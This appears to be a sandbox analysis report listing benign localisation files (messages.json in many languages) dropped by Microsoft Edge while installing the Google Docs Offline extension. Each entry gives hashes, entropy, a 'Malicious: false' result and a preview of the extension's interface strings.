SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
